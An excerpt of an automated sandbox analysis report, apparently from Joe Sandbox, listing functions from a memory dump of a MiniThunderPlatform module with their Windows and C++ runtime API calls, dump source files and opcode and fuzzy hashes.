                                                                                                                                              • Opcode ID: 41d71b7a1eb3de20970307da4029ca60f3fdd9365190e1081fa608bce4a1e9e2
                                                                                                                                              • Instruction ID: 0fe4f5f2e4882a3cb1c1772c7f5c950518104c2eddf394ef1984c607b141c9c1
                                                                                                                                              • Opcode Fuzzy Hash: 41d71b7a1eb3de20970307da4029ca60f3fdd9365190e1081fa608bce4a1e9e2
                                                                                                                                              • Instruction Fuzzy Hash: BE51A37A3042049BC600DB09EC91EAFB3E9EFD9A16F14416EF944DB241D662ED1DC7B1
                                                                                                                                              Function 10059330 Relevance: 6.2, APIs: 4, Instructions: 179COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 1005935B
                                                                                                                                                • Part of subcall function 10173FF0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,00000000,?,00000014,10058B6A,1005BF55,00000000,?,?,?,00000000,1005901A,?,1005BF55), ref: 1017400D
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 10059555
                                                                                                                                                • Part of subcall function 10056A40: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,1030012C,?,00000028,00000000,00000000,10059399,?,?,?,?,?,?,?,1030012C,?), ref: 10056A5A
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100593D7
                                                                                                                                                • Part of subcall function 10056A00: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,00000000,00000000,00000000,?,00000028,100593A8,?,00000003,?), ref: 10056A1A
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                                • Part of subcall function 10173A00: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(0000000D,?,00000000,00000014,?,00000014,10173FFF,?,00000000,?,00000014,10058B6A,1005BF55,00000000,?,?), ref: 10173A25
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 10059501
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@1@@std@@D@2@@0@0@V?$basic_string@$??$?$??$?8CriticalSection$??1?$basic_string@??3@CountD@2@@std@@EnterLeaveTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1304188127-0
                                                                                                                                              • Opcode ID: 3bb04e9556195999fff00aa84da7c4b781fbe3b6024a0b969a7db7d356018f32
                                                                                                                                              • Instruction ID: a91ac9e02f9c10f1cca5bc14aeffaba4e7cec129752ec8682b601cc42b1f0653
                                                                                                                                              • Opcode Fuzzy Hash: 3bb04e9556195999fff00aa84da7c4b781fbe3b6024a0b969a7db7d356018f32
                                                                                                                                              • Instruction Fuzzy Hash: AA5181742046419BCB54DF24C985B6FB7F9FF85284F41491CF98A97292EB30EC49CBA2
                                                                                                                                              Function 100A55F0 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10027700: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?,?,?,100291DB,00000000), ref: 1002771C
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027729
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027736
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027743
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027750
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1002775F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5761
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5773
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5785
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A579A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V12@$?assign@?$basic_string@V12@@$??1?$basic_string@$?erase@?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 689347063-0
                                                                                                                                              • Opcode ID: 89a888e59fafa3b9b06945bcca80367995ae8f294ab5b8f7931528a02c83c75d
                                                                                                                                              • Instruction ID: 9dc8e614902463b5e30f0387ff6a7c78661d9f46ecb7d15c91953bf41b5ea050
                                                                                                                                              • Opcode Fuzzy Hash: 89a888e59fafa3b9b06945bcca80367995ae8f294ab5b8f7931528a02c83c75d
                                                                                                                                              • Instruction Fuzzy Hash: 1A516175204740DFD324DB69C898F9BB7E9FB89700F444A1DF59A87291DB70A904CB62
                                                                                                                                              Function 100253EE Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100253F3
                                                                                                                                                • Part of subcall function 10023F17: RtlEnterCriticalSection.NTDLL(?), ref: 10023F26
                                                                                                                                                • Part of subcall function 1002B1FA: __EH_prolog.LIBCMT ref: 1002B1FF
                                                                                                                                                • Part of subcall function 1002B1FA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?), ref: 1002B215
                                                                                                                                                • Part of subcall function 1002B1FA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 1002B233
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100254DE
                                                                                                                                                • Part of subcall function 1002B40C: __EH_prolog.LIBCMT ref: 1002B411
                                                                                                                                                • Part of subcall function 1002B40C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1002B427
                                                                                                                                                • Part of subcall function 1002B40C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(000000A1), ref: 1002B445
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?,?,?), ref: 10025483
                                                                                                                                                • Part of subcall function 100249A9: __EH_prolog.LIBCMT ref: 100249AE
                                                                                                                                                • Part of subcall function 100249A9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CXlData,?,?), ref: 100249C5
                                                                                                                                                • Part of subcall function 100249A9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(2CDAD45E), ref: 100249E4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?), ref: 100254B2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@H_prolog$CriticalSection$EnterLeavemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1374796432-0
                                                                                                                                              • Opcode ID: de4581c65d791a471327e38164a172125aef250565139b1f575d10bd6ab86934
                                                                                                                                              • Instruction ID: fa319bcaa08d220682bf1b2ae0797be01cc542634506bd6bcd3aac76dc2f38ae
                                                                                                                                              • Opcode Fuzzy Hash: de4581c65d791a471327e38164a172125aef250565139b1f575d10bd6ab86934
                                                                                                                                              • Instruction Fuzzy Hash: B531B231900215DFCB10EFA8E848AAEB7F4FF5834AF504529F847A7251CB76AD80CB55
                                                                                                                                              Function 10034337 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000,?,?,?,?,?), ref: 1003436D
                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?), ref: 1003437A
                                                                                                                                              • AtlComPtrAssign.ATL71 ref: 1003438D
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(-00000004), ref: 10034438
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign$CriticalEventLeaveSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2966056190-0
                                                                                                                                              • Opcode ID: 759e14239603be8452e9e4cf39067cf2626e7614ce1151477309dc9a7d180081
                                                                                                                                              • Instruction ID: b1be4a3ba99a88e77a375474ed771e4bca1fa9012848765d735580356f489033
                                                                                                                                              • Opcode Fuzzy Hash: 759e14239603be8452e9e4cf39067cf2626e7614ce1151477309dc9a7d180081
                                                                                                                                              • Instruction Fuzzy Hash: C03176396043419FC705CF64D884FAAB3E5EB89601F12486CF48A8B241DB70BD49CB62
                                                                                                                                              Function 100C42A7 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C42AC
                                                                                                                                                • Part of subcall function 100C3603: __EH_prolog.LIBCMT ref: 100C3608
                                                                                                                                                • Part of subcall function 100C3603: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C3616
                                                                                                                                                • Part of subcall function 100C3603: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C3625
                                                                                                                                                • Part of subcall function 100C3603: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C3634
                                                                                                                                                • Part of subcall function 100C3603: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C3643
                                                                                                                                                • Part of subcall function 100C3603: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C364E
                                                                                                                                                • Part of subcall function 100C3603: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C365F
                                                                                                                                                • Part of subcall function 100C3678: __EH_prolog.LIBCMT ref: 100C367D
                                                                                                                                                • Part of subcall function 100C3678: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100C42FB,?,00000000,00000000,00000000), ref: 100C3693
                                                                                                                                                • Part of subcall function 100C3678: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100C42FB,?,00000000,00000000,00000000), ref: 100C36A0
                                                                                                                                                • Part of subcall function 100C3678: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100C42FB,?,00000000,00000000,00000000), ref: 100C36AC
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,00000000,00000000,00000000), ref: 100C4312
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 100C4321
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 100C4330
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??$?8??0?$basic_string@??1?$basic_string@?assign@?$basic_string@D@1@@std@@D@2@@0@0@H_prologV12@V12@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1274185918-0
                                                                                                                                              • Opcode ID: 70db0ce36b06004d8b0824d8f88f274d457b2ef9716d51319480e239713a8a0b
                                                                                                                                              • Instruction ID: 20ee379eeaf55b27672b38c10d06035e63a151d33e06eb18c12b11373d965bab
                                                                                                                                              • Opcode Fuzzy Hash: 70db0ce36b06004d8b0824d8f88f274d457b2ef9716d51319480e239713a8a0b
                                                                                                                                              • Instruction Fuzzy Hash: D9214A3640020ABBDF15CFA4DD82FEE7B79FF44264F108189F85563191DB31AA65DB60
                                                                                                                                              Function 1000411C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000416A
                                                                                                                                                • Part of subcall function 10013C80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CStringSetter,00000000,?,?,10240554,000000FF,1000417F,?), ref: 10013CA9
                                                                                                                                                • Part of subcall function 10013C80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10013CCF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10004199
                                                                                                                                              • memcpy.MSVCR71(?,?,?), ref: 100041B8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100041C3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 283879607-0
                                                                                                                                              • Opcode ID: 8d19f6dddbbfab28133937ad45566c715a6b5c89f597d59c7b3199f63626187f
                                                                                                                                              • Instruction ID: 83ad456fd4cd9bf7cba74d630cdd0cb4615955ba5da370fc8bc72ec0f2e3ef09
                                                                                                                                              • Opcode Fuzzy Hash: 8d19f6dddbbfab28133937ad45566c715a6b5c89f597d59c7b3199f63626187f
                                                                                                                                              • Instruction Fuzzy Hash: 9521A7B1900129DFDB00DFA4DC949EEB3B8FF28390B114658E802A7195DF706E45CB90
                                                                                                                                              Function 10035300 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 10035337
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1003535D
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100353B2
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100353CF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2978645861-0
                                                                                                                                              • Opcode ID: 3e3c546d9800980127ba49959d54c07901da22a99131b0587248aaa2ef643178
                                                                                                                                              • Instruction ID: 8d39e9a3506a1e0c6d39976e55b3fbf63b4ca9bfbfd6eb8e123360ef1ccd750c
                                                                                                                                              • Opcode Fuzzy Hash: 3e3c546d9800980127ba49959d54c07901da22a99131b0587248aaa2ef643178
                                                                                                                                              • Instruction Fuzzy Hash: 0D21A1762046419FC315CF18D888B5AB7E4FB88762F408A3EF84AD7750D73AE908CB21
                                                                                                                                              Function 10048010 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 1004804B
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 10048071
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 10048089
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 1004809E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1972284567-0
                                                                                                                                              • Opcode ID: 52c87dab247a6dd324a098d7144e5e5071ddece8097642a78e9733a603187222
                                                                                                                                              • Instruction ID: 2b06bd602da1976fcc2dea1cdb3b2ce6f6c796ce0d676ec752ead2b668ef9760
                                                                                                                                              • Opcode Fuzzy Hash: 52c87dab247a6dd324a098d7144e5e5071ddece8097642a78e9733a603187222
                                                                                                                                              • Instruction Fuzzy Hash: 2E21E475600700AFD610DBA9CC88F6BB3A8FF89710F204968E646DB650DB75F846CBA4
                                                                                                                                              Function 10070260 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 100702A6
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100702CC
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10070319
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10070335
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2978645861-0
                                                                                                                                              • Opcode ID: 2c4285890806c6e0d9fb2b2dad48ba951be8a236bd22e49bd2e03851b3aa7324
                                                                                                                                              • Instruction ID: 1883d2a56e31a86c71a04ab0094054be53de0c561f715c0ec4a7273ec2203325
                                                                                                                                              • Opcode Fuzzy Hash: 2c4285890806c6e0d9fb2b2dad48ba951be8a236bd22e49bd2e03851b3aa7324
                                                                                                                                              • Instruction Fuzzy Hash: 7E217F3A504601DBC364CF18C888A5BB7E5FB99B10F14CB2EF48AD7790D739A945CB51
                                                                                                                                              Function 10059150 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 10059179
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,76105E10), ref: 100591B5
                                                                                                                                              • ResetEvent.KERNEL32(00000000,?), ref: 10059201
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 1005920C
                                                                                                                                                • Part of subcall function 10173A00: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(0000000D,?,00000000,00000014,?,00000014,10173FFF,?,00000000,?,00000014,10058B6A,1005BF55,00000000,?,?), ref: 10173A25
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
